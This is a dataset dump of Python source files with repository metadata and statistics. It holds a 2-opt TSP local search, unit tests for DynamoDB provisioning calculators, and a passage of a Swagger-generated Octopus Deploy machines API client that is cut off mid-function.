| 0.5
| 0.072727
| 0.123636
| 0.210909
| 0.298182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046205
| 606
| 4
| 179
| 151.5
| 0.951557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c71badeebc016b9f3540f2fcf934a2bcd95ea090
| 9,264
|
py
|
Python
|
local_search_2opt.py
|
CLAHRCWessex/SymmetricTSP
|
2cfce4146ece0c784aa62f1b0e2ac1cb2e91b6c4
|
[
"MIT"
] | 1
|
2020-06-01T22:56:11.000Z
|
2020-06-01T22:56:11.000Z
|
local_search_2opt.py
|
CLAHRCWessex/SymmetricTSP
|
2cfce4146ece0c784aa62f1b0e2ac1cb2e91b6c4
|
[
"MIT"
] | null | null | null |
local_search_2opt.py
|
CLAHRCWessex/SymmetricTSP
|
2cfce4146ece0c784aa62f1b0e2ac1cb2e91b6c4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
local search implemented with 2-opt swap
2-opt = Switch 2 edges
@author: Tom Monks
"""
from objective import tour_cost
class LocalSearchArgs(object):
"""
Argument class for local search classes
"""
def __init__(self):
pass
class OrdinaryDecent2Opt(object):
"""
Local (neighbourhood) search implemented as first improvement
with 2-opt swaps
"""
def __init__(self, args):
"""
Constructor Method
@init_solution = initial tour
@matrix = matrix of travel costs
"""
self.matrix = args.matrix
self.set_init_solution(args.init_solution)
#self.swapper = args.swapper
def set_init_solution(self, solution):
self.solution = solution
self.best_solutions = [solution]
self.best_cost = tour_cost(self.solution, self.matrix)
def solve(self):
"""
        Run the solution algorithm.
        Note: the algorithm is the same as ordinary descent
        where 2 customers are swapped, apart from the call to the swap
        code. Can I encapsulate the swap code so that it can be reused?
"""
improvement = True
while(improvement):
improvement = False
for city1 in range(1, len(self.solution) - 1):
#print("city1: {0}".format(city1))
for city2 in range(city1 + 1, len(self.solution) - 1):
#print("city2: {0}".format(city2))
self.reverse_sublist(self.solution, city1, city2)
new_cost = tour_cost(self.solution, self.matrix)
#if (new_cost == self.best_cost):
#self.best_solutions.append(self.solution)
#improvement = True
if (new_cost < self.best_cost):
self.best_cost = new_cost
self.best_solutions = [self.solution]
improvement = True
else:
self.reverse_sublist(self.solution, city1, city2)
def reverse_sublist(self, lst, start, end):
"""
Reverse a slice of the @lst elements between
@start and @end
"""
lst[start:end+1] = reversed(lst[start:end+1])
return lst
class OrdinaryDecent2OptNew(object):
"""
Local (neighbourhood) search implemented as first improvement
with 2-opt swaps
"""
def __init__(self, objective, init_solution):
"""
Constructor Method
Parameters:
objective - objective function
init_solution = initial tour
"""
self._objective = objective
self.set_init_solution(init_solution)
def set_init_solution(self, solution):
self.solution = solution
self.best_solutions = [solution]
self.best_cost = self._objective.evaluate(self.solution)
def solve(self):
"""
        Run the solution algorithm.
        Note: the algorithm is the same as ordinary descent
        where 2 customers are swapped, apart from the call to the swap
        code. Can I encapsulate the swap code so that it can be reused?
"""
improvement = True
while(improvement):
improvement = False
for city1 in range(1, len(self.solution) - 1):
#print("city1: {0}".format(city1))
for city2 in range(city1 + 1, len(self.solution) - 1):
#print("city2: {0}".format(city2))
self.reverse_sublist(self.solution, city1, city2)
#new_cost = tour_cost(self.solution, self.matrix)
new_cost = self._objective.evaluate(self.solution)
#if (new_cost == self.best_cost):
#self.best_solutions.append(self.solution)
#improvement = True
if (new_cost < self.best_cost):
self.best_cost = new_cost
self.best_solutions = [self.solution]
improvement = True
else:
self.reverse_sublist(self.solution, city1, city2)
def reverse_sublist(self, lst, start, end):
"""
Reverse a slice of the @lst elements between
@start and @end
Parameters:
--------
lst - np.array, vector representing a solution
start - int, start index of sublist (inclusive)
end - int, end index of sublist (inclusive)
"""
lst[start:end] = lst[start:end][::-1]
class OrdinaryDecent2OptNew__(object):
"""
Local (neighbourhood) search implemented as first improvement
"""
def __init__(self, objective, init_solution):
"""
Constructor Method
Parameters:
----------
@init_solution = initial tour
@matrix = matrix of travel costs
"""
self._objective = objective
self.set_init_solution(init_solution)
#self.swapper = args.swapper unused?
def set_init_solution(self, solution):
self.solution = solution
self.best_solutions = [solution]
#self.best_cost = tour_cost(self.solution, self.matrix)
self.best_cost = self._objective.evaluate(solution)
def solve(self):
improvement = True
while(improvement):
improvement = False
for city1 in range(1, len(self.solution) - 1):
for city2 in range(city1 + 1, len(self.solution) - 1):
self.reverse_sub_list(self.solution, city1, city2)
#new_cost = tour_cost(self.solution, self.matrix)
new_cost = self._objective.evaluate(self.solution)
if (new_cost == self.best_cost):
self.best_solutions.append(self.solution)
improvement = True
elif (new_cost < self.best_cost):
self.best_cost = new_cost
self.best_solutions = [self.solution]
improvement = True
else:
                        self.reverse_sub_list(self.solution, city1, city2)  # undo the trial reversal
def reverse_sub_list(self, lst, start, end):
"""
Reverse a slice of the @lst elements between
@start and @end
"""
lst[start:end] = lst[start:end][::-1]
return lst
class SteepestDecent2Opt(object):
"""
    Local (neighbourhood) search implemented as steepest descent
with 2-opt swaps
"""
def __init__(self, args):
"""
Constructor Method
@init_solution = initial tour
@matrix = matrix of travel costs
"""
self.matrix = args.matrix
self.set_init_solution(args.init_solution)
def set_init_solution(self, solution):
self.solution = solution
self.best_solutions = [solution]
self.best_cost = tour_cost(self.solution, self.matrix)
def solve(self):
improvement = True
best_swap_city1 = 0
best_swap_city2 = 0
while(improvement):
improvement = False
for city1 in range(1, len(self.solution) - 1):
for city2 in range(city1 + 1, len(self.solution) - 1):
self.reverse_sublist(self.solution, city1, city2)
new_cost = tour_cost(self.solution, self.matrix)
if (new_cost < self.best_cost):
self.best_cost = new_cost
best_swap_city1 = city1
best_swap_city2 = city2
improvement = True
self.reverse_sublist(self.solution, city1, city2)
self.reverse_sublist(self.solution, best_swap_city1, best_swap_city2)
self.best_solutions = [self.solution]
best_swap_city1 = 0
best_swap_city2 = 0
def reverse_sublist(self, lst, start, end):
"""
Reverse a slice of the @lst elements between
@start and @end
"""
lst[start:end+1] = reversed(lst[start:end+1])
return lst
| 32.391608
| 82
| 0.490933
| 881
| 9,264
| 5.00681
| 0.137344
| 0.111539
| 0.046248
| 0.0399
| 0.881886
| 0.866243
| 0.824756
| 0.804579
| 0.791884
| 0.747223
| 0
| 0.016837
| 0.429404
| 9,264
| 286
| 83
| 32.391608
| 0.817631
| 0.229383
| 0
| 0.830357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151786
| false
| 0.008929
| 0.008929
| 0
| 0.232143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c72bf0292f15fa32241037c7bde3304f253bf448
| 6,168
|
py
|
Python
|
dynamic_dynamodb/tests/test_calculators.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
dynamic_dynamodb/tests/test_calculators.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
dynamic_dynamodb/tests/test_calculators.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
""" Testing the Dynamic DynamoDB calculators """
import unittest
from dynamic_dynamodb import calculators
class TestCalculators(unittest.TestCase):
""" Test the Dynamic DynamoDB calculators """
def test_decrease_reads_in_percent(self):
""" Ensure that a regular decrease works """
result = calculators.decrease_reads_in_percent(200, 90, 1, 'test')
self.assertEqual(result, 20)
def test_decrease_reads_in_percent_hit_min_value(self):
""" Check that min values are honoured """
result = calculators.decrease_reads_in_percent(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_decrease_reads_in_percent_more_than_100_percent(self):
""" Handle decreases of more that 100% """
result = calculators.decrease_reads_in_percent(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_decrease_reads_in_percent_type_current_provisioning(self):
""" Check that current_provisioning only takes an int """
self.assertRaises(
TypeError,
calculators.decrease_reads_in_percent,
'100',
90,
1,
'test')
def test_decrease_writes_in_percent(self):
""" Ensure that a regular decrease works """
result = calculators.decrease_writes_in_percent(200, 90, 1, 'test')
self.assertEqual(result, 20)
def test_decrease_writes_in_percent_hit_min_value(self):
""" Check that min values are honoured """
result = calculators.decrease_writes_in_percent(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_decrease_writes_in_percent_more_than_100_percent(self):
""" Handle decreases of more that 100% """
result = calculators.decrease_writes_in_percent(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_decrease_writes_in_percent_type_current_provisioning(self):
""" Check that current_provisioning only takes an int """
self.assertRaises(
TypeError,
calculators.decrease_writes_in_percent,
'100',
90,
1,
'test')
def test_decrease_reads_in_units(self):
""" Ensure that a regular decrease works """
result = calculators.decrease_reads_in_units(200, 90, 1, 'test')
self.assertEqual(result, 110)
    def test_decrease_reads_in_units_hit_min_value(self):
""" Check that min values are honoured """
result = calculators.decrease_reads_in_units(20, 50, 15, 'test')
self.assertEqual(result, 15)
    def test_decrease_reads_in_units_more_than_100_percent(self):
        """ Handle decreases of more than 100% """
result = calculators.decrease_reads_in_units(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_decrease_writes_in_units(self):
""" Ensure that a regular decrease works """
result = calculators.decrease_writes_in_units(200, 90, 1, 'test')
self.assertEqual(result, 110)
def test_decrease_writes_in_units_hit_min_value(self):
""" Check that min values are honoured """
result = calculators.decrease_writes_in_units(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_increase_reads_in_percent(self):
""" Ensure that a regular increase works """
result = calculators.increase_reads_in_percent(200, 50, 400, 'test')
self.assertEqual(result, 300)
def test_increase_reads_in_percent_hit_max_value(self):
""" Check that max values are honoured """
result = calculators.increase_reads_in_percent(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_increase_reads_in_percent_more_than_100_percent(self):
""" Handle increases of more that 100% """
result = calculators.increase_reads_in_percent(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_increase_reads_in_percent_type_current_provisioning(self):
""" Check that current_provisioning only takes an int """
self.assertRaises(
TypeError,
calculators.increase_reads_in_percent,
'100',
90,
1,
'test')
def test_increase_writes_in_percent(self):
""" Ensure that a regular increase works """
result = calculators.increase_writes_in_percent(200, 50, 400, 'test')
self.assertEqual(result, 300)
def test_increase_writes_in_percent_hit_max_value(self):
""" Check that max values are honoured """
result = calculators.increase_writes_in_percent(20, 50, 15, 'test')
self.assertEqual(result, 15)
def test_increase_writes_in_percent_more_than_100_percent(self):
""" Handle increases of more that 100% """
result = calculators.increase_writes_in_percent(20, 120, 1, 'test')
self.assertEqual(result, 1)
def test_increase_writes_in_percent_type_current_provisioning(self):
""" Check that current_provisioning only takes an int """
self.assertRaises(
TypeError,
calculators.increase_writes_in_percent,
'100',
90,
1,
'test')
def test_increase_reads_in_units(self):
""" Ensure that a regular increase works """
result = calculators.increase_reads_in_units(200, 90, 300, 'test')
self.assertEqual(result, 290)
def test_increase_reads_in_units_hit_max_units(self):
""" Check that max values are honoured """
result = calculators.increase_reads_in_units(20, 50, 25, 'test')
self.assertEqual(result, 25)
def test_increase_writes_in_units(self):
""" Ensure that a regular increase works """
result = calculators.increase_writes_in_units(200, 90, 300, 'test')
self.assertEqual(result, 290)
def test_increase_writes_in_units_hit_max_value(self):
""" Check that max values are honoured """
result = calculators.increase_writes_in_units(20, 10, 25, 'test')
self.assertEqual(result, 25)
if __name__ == '__main__':
unittest.main(verbosity=3)
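The calculator implementations are not shown in this file, but the assertions pin down their contract: scale by the percentage, then clamp to the min/max units. A hand-written equivalent, for illustration only (not the library's actual code):

def decrease_in_percent(current, percent, min_units):
    # 200 read units decreased by 90% -> 20, never below min_units
    return max(current - current * percent // 100, min_units)

def increase_in_percent(current, percent, max_units):
    # 200 read units increased by 50% -> 300, never above max_units
    return min(current + current * percent // 100, max_units)

assert decrease_in_percent(200, 90, 1) == 20
assert decrease_in_percent(20, 50, 15) == 15    # clamped up to the minimum
assert increase_in_percent(200, 50, 400) == 300
assert increase_in_percent(20, 120, 1) == 1     # clamped down to the maximum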
| 39.286624
| 77
| 0.665532
| 761
| 6,168
| 5.074901
| 0.09724
| 0.079234
| 0.103314
| 0.13594
| 0.941999
| 0.940963
| 0.901346
| 0.894355
| 0.88581
| 0.841792
| 0
| 0.049638
| 0.238975
| 6,168
| 156
| 78
| 39.538462
| 0.773115
| 0.174935
| 0
| 0.45
| 0
| 0
| 0.024361
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| false
| 0
| 0.02
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c787224e36fcbcc301a069c3f35301a7b194d2b4
| 87,834
|
py
|
Python
|
octopus_deploy_swagger_client/octopus_deploy_client/machines_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/octopus_deploy_client/machines_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/octopus_deploy_client/machines_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from octopus_deploy_swagger_client.api_client import ApiClient
class MachinesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, **kwargs): # noqa: E501
"""Create a DeploymentTargetResource # noqa: E501
Creates a new machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(async_req=True)
>>> result = thread.get()
:param async_req bool
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(**kwargs) # noqa: E501
return data
def create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, **kwargs): # noqa: E501
"""Create a DeploymentTargetResource # noqa: E501
Creates a new machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['deployment_target_resource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment_target_resource' in params:
body_params = params['deployment_target_resource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, **kwargs): # noqa: E501
"""Create a DeploymentTargetResource # noqa: E501
Creates a new machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
else:
(data) = self.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
return data
def create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, **kwargs): # noqa: E501
"""Create a DeploymentTargetResource # noqa: E501
Creates a new machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'deployment_target_resource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `create_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment_target_resource' in params:
body_params = params['deployment_target_resource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder(self, id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder # noqa: E501
Get the status of the network connection between the Octopus server and a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the resource (required)
:return: MachineConnectionStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_with_http_info(id, **kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_with_http_info(self, id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder # noqa: E501
Get the status of the network connection between the Octopus server and a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the resource (required)
:return: MachineConnectionStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}/connection', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MachineConnectionStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces # noqa: E501
Get the status of the network connection between the Octopus server and a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the resource (required)
:return: MachineConnectionStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces # noqa: E501
Get the status of the network connection between the Octopus server and a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the resource (required)
:return: MachineConnectionStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_deployment_target_connection_status_responder_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}/connection', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MachineConnectionStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder(self, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder # noqa: E501
Interrogate a machine for communication details so that it may be added to the installation. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: MachineResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_with_http_info(**kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_with_http_info(self, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder # noqa: E501
Interrogate a machine for communication details so that it may be added to the installation. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: MachineResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['host','port'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'host' in params:
query_params.append(('host', params['host']))
if 'port' in params:
query_params.append(('port', params['port']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/discover', 'GET',
path_params,
